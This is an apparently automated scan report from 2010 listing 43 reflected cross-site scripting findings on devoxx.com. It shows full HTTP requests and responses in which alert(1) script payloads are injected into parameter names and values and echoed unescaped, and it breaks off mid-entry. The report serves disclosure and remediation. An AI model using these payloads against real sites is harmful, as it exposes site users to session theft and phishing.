Report generated by XSS.CX at Mon Nov 15 11:49:15 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


Contents

1. Cross-site scripting (reflected)

1.1. http://devoxx.com/display/Devoxx2K10/Contact+Us [name of an arbitrarily supplied request parameter]

1.2. http://devoxx.com/display/Devoxx2K10/Devoxx+2008 [name of an arbitrarily supplied request parameter]

1.3. http://devoxx.com/display/Devoxx2K10/Devoxx+2009 [name of an arbitrarily supplied request parameter]

1.4. http://devoxx.com/display/Devoxx2K10/Home [a8f51--><script>alert(1)</script><H1>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM</H1> parameter]

1.5. http://devoxx.com/display/Devoxx2K10/Home [a8f51--><script>alert(1)</script><font%20color parameter]

1.6. http://devoxx.com/display/Devoxx2K10/Home [a8f51--><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM parameter]

1.7. http://devoxx.com/display/Devoxx2K10/Home [a8f51--><script>alert(1)</script>db69e0aef33 parameter]

1.8. http://devoxx.com/display/Devoxx2K10/Home [name of an arbitrarily supplied request parameter]

1.9. http://devoxx.com/display/Devoxx2K10/Javaholics [name of an arbitrarily supplied request parameter]

1.10. http://devoxx.com/display/Devoxx2K10/Jboss [name of an arbitrarily supplied request parameter]

1.11. http://devoxx.com/display/Devoxx2K10/News [name of an arbitrarily supplied request parameter]

1.12. http://devoxx.com/display/Devoxx2K10/Newsletter [name of an arbitrarily supplied request parameter]

1.13. http://devoxx.com/display/Devoxx2K10/Oracle [name of an arbitrarily supplied request parameter]

1.14. http://devoxx.com/display/Devoxx2K10/Partners [name of an arbitrarily supplied request parameter]

1.15. http://devoxx.com/display/Devoxx2K10/Practical [name of an arbitrarily supplied request parameter]

1.16. http://devoxx.com/display/Devoxx2K10/Privacy+Policy [name of an arbitrarily supplied request parameter]

1.17. http://devoxx.com/display/Devoxx2K10/Schedule [name of an arbitrarily supplied request parameter]

1.18. http://devoxx.com/display/Devoxx2K10/Schedule+REST+interface [name of an arbitrarily supplied request parameter]

1.19. http://devoxx.com/display/Devoxx2K10/Schedules [name of an arbitrarily supplied request parameter]

1.20. http://devoxx.com/display/Devoxx2K10/Sidebar [name of an arbitrarily supplied request parameter]

1.21. http://devoxx.com/display/Devoxx2K10/Sponsors [name of an arbitrarily supplied request parameter]

1.22. http://devoxx.com/display/Devoxx2K10/Twitter [name of an arbitrarily supplied request parameter]

1.23. http://devoxx.com/ [User-Agent HTTP header]

1.24. http://devoxx.com/display/Devoxx2K10 [User-Agent HTTP header]

1.25. http://devoxx.com/display/Devoxx2K10/Contact+Us [User-Agent HTTP header]

1.26. http://devoxx.com/display/Devoxx2K10/Devoxx+2008 [User-Agent HTTP header]

1.27. http://devoxx.com/display/Devoxx2K10/Devoxx+2009 [User-Agent HTTP header]

1.28. http://devoxx.com/display/Devoxx2K10/Home [User-Agent HTTP header]

1.29. http://devoxx.com/display/Devoxx2K10/Javaholics [User-Agent HTTP header]

1.30. http://devoxx.com/display/Devoxx2K10/Jboss [User-Agent HTTP header]

1.31. http://devoxx.com/display/Devoxx2K10/News [User-Agent HTTP header]

1.32. http://devoxx.com/display/Devoxx2K10/Newsletter [User-Agent HTTP header]

1.33. http://devoxx.com/display/Devoxx2K10/Oracle [User-Agent HTTP header]

1.34. http://devoxx.com/display/Devoxx2K10/Partners [User-Agent HTTP header]

1.35. http://devoxx.com/display/Devoxx2K10/Practical [User-Agent HTTP header]

1.36. http://devoxx.com/display/Devoxx2K10/Privacy+Policy [User-Agent HTTP header]

1.37. http://devoxx.com/display/Devoxx2K10/Schedule [User-Agent HTTP header]

1.38. http://devoxx.com/display/Devoxx2K10/Schedule+REST+interface [User-Agent HTTP header]

1.39. http://devoxx.com/display/Devoxx2K10/Schedules [User-Agent HTTP header]

1.40. http://devoxx.com/display/Devoxx2K10/Sidebar [User-Agent HTTP header]

1.41. http://devoxx.com/display/Devoxx2K10/Sponsors [User-Agent HTTP header]

1.42. http://devoxx.com/display/Devoxx2K10/Twitter [User-Agent HTTP header]

1.43. http://devoxx.com/homepage.action [User-Agent HTTP header]



1. Cross-site scripting (reflected)
There are 43 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://devoxx.com/display/Devoxx2K10/Contact+Us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Contact+Us

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6c9c5--><script>alert(1)</script>329e4ea39cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Contact+Us?6c9c5--><script>alert(1)</script>329e4ea39cd=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:40 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842960278
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35864

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Contact+Us?6c9c5--><script>alert(1)</script>329e4ea39cd=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@381c692d
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.2. http://devoxx.com/display/Devoxx2K10/Devoxx+2008 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Devoxx+2008

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cecbd--><script>alert(1)</script>01ad4165a5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Devoxx+2008?cecbd--><script>alert(1)</script>01ad4165a5a=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:26 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843006197
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 140846

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Devoxx+2008?cecbd--><script>alert(1)</script>01ad4165a5a=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@1380179f
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.3. http://devoxx.com/display/Devoxx2K10/Devoxx+2009 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Devoxx+2009

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4b156--><script>alert(1)</script>9c82cd46bd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Devoxx+2009?4b156--><script>alert(1)</script>9c82cd46bd5=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:44:30 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843070377
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 174350

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Devoxx+2009?4b156--><script>alert(1)</script>9c82cd46bd5=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@2821886c
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.4. http://devoxx.com/display/Devoxx2K10/Home [a8f51--><script>alert(1)</script><H1>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM</H1> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The value of the a8f51--><script>alert(1)</script><H1>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM</H1> request parameter is copied into the HTML document as plain text between tags. The payload 92591<script>alert(1)</script>ed41ee64bf1 was submitted in the a8f51--><script>alert(1)</script><H1>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM</H1> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/Devoxx2K10/Home?a8f51--><script>alert(1)</script><H1>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM</H1>=192591<script>alert(1)</script>ed41ee64bf1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:35:55 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842555366
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38447

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;
...[SNIP]...
</H1>=192591<script>alert(1)</script>ed41ee64bf1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@3b08eade
adaptavist.builder.helper: com.atlassia
...[SNIP]...

1.5. http://devoxx.com/display/Devoxx2K10/Home [a8f51--><script>alert(1)</script><font%20color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The value of the a8f51--><script>alert(1)</script><font%20color request parameter is copied into the name of an HTML tag. The payload 8b688><script>alert(1)</script>a75c5490369 was submitted in the a8f51--><script>alert(1)</script><font%20color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/Devoxx2K10/Home?a8f51--><script>alert(1)</script><font%20color="8b688><script>alert(1)</script>a75c5490369 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:35:55 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842555802
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38413

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;
...[SNIP]...
<font%20color="8b688><script>alert(1)</script>a75c5490369'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@6c5fc006
adaptavist.builder.helper: com.atlassia
...[SNIP]...

1.6. http://devoxx.com/display/Devoxx2K10/Home [a8f51--><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The value of the a8f51--><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM request parameter is copied into the HTML document as plain text between tags. The payload b0d96<script>alert(1)</script>c9b2c36aef6 was submitted in the a8f51--><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/Devoxx2K10/Home?a8f51--><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM=1b0d96<script>alert(1)</script>c9b2c36aef6 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:35:56 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842556135
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM=1b0d96<script>alert(1)</script>c9b2c36aef6'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@166975b9
adaptavist.builder.helper: com.atlassia
...[SNIP]...

1.7. http://devoxx.com/display/Devoxx2K10/Home [a8f51--><script>alert(1)</script>db69e0aef33 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The value of the a8f51--><script>alert(1)</script>db69e0aef33 request parameter is copied into the HTML document as plain text between tags. The payload f89e1<script>alert(1)</script>3201c43307f was submitted in the a8f51--><script>alert(1)</script>db69e0aef33 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/Devoxx2K10/Home?a8f51--><script>alert(1)</script>db69e0aef33=1f89e1<script>alert(1)</script>3201c43307f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:35:56 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842556120
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;
...[SNIP]...
</script>db69e0aef33=1f89e1<script>alert(1)</script>3201c43307f'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@2db3dffd
adaptavist.builder.helper: com.atlassia
...[SNIP]...

1.8. http://devoxx.com/display/Devoxx2K10/Home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 10455--><script>alert(1)</script>0b98aba86be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Home?10455--><script>alert(1)</script>0b98aba86be=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:36:15 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842575740
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38370

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;
...[SNIP]...
727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Home?10455--><script>alert(1)</script>0b98aba86be=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@555cc586
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.9. http://devoxx.com/display/Devoxx2K10/Javaholics [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Javaholics

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5079f--><script>alert(1)</script>6c6c8244915 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Javaholics?5079f--><script>alert(1)</script>6c6c8244915=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:26 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842826176
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 131053

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Javaholics?5079f--><script>alert(1)</script>6c6c8244915=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@219107ac
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.10. http://devoxx.com/display/Devoxx2K10/Jboss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Jboss

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 579a4--><script>alert(1)</script>b3f778dd671 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Jboss?579a4--><script>alert(1)</script>b3f778dd671=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:10 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842930541
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35549

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Jboss?579a4--><script>alert(1)</script>b3f778dd671=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@28c0e5ed
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.11. http://devoxx.com/display/Devoxx2K10/News [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/News

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 35f79--><script>alert(1)</script>b25f2783080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/News?35f79--><script>alert(1)</script>b25f2783080=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:12 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842812010
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38188

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/News?35f79--><script>alert(1)</script>b25f2783080=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@3a01ab9c
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.12. http://devoxx.com/display/Devoxx2K10/Newsletter [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Newsletter

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4c08e--><script>alert(1)</script>092395d5d3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Newsletter?4c08e--><script>alert(1)</script>092395d5d3c=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:27 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842947522
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 37934

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
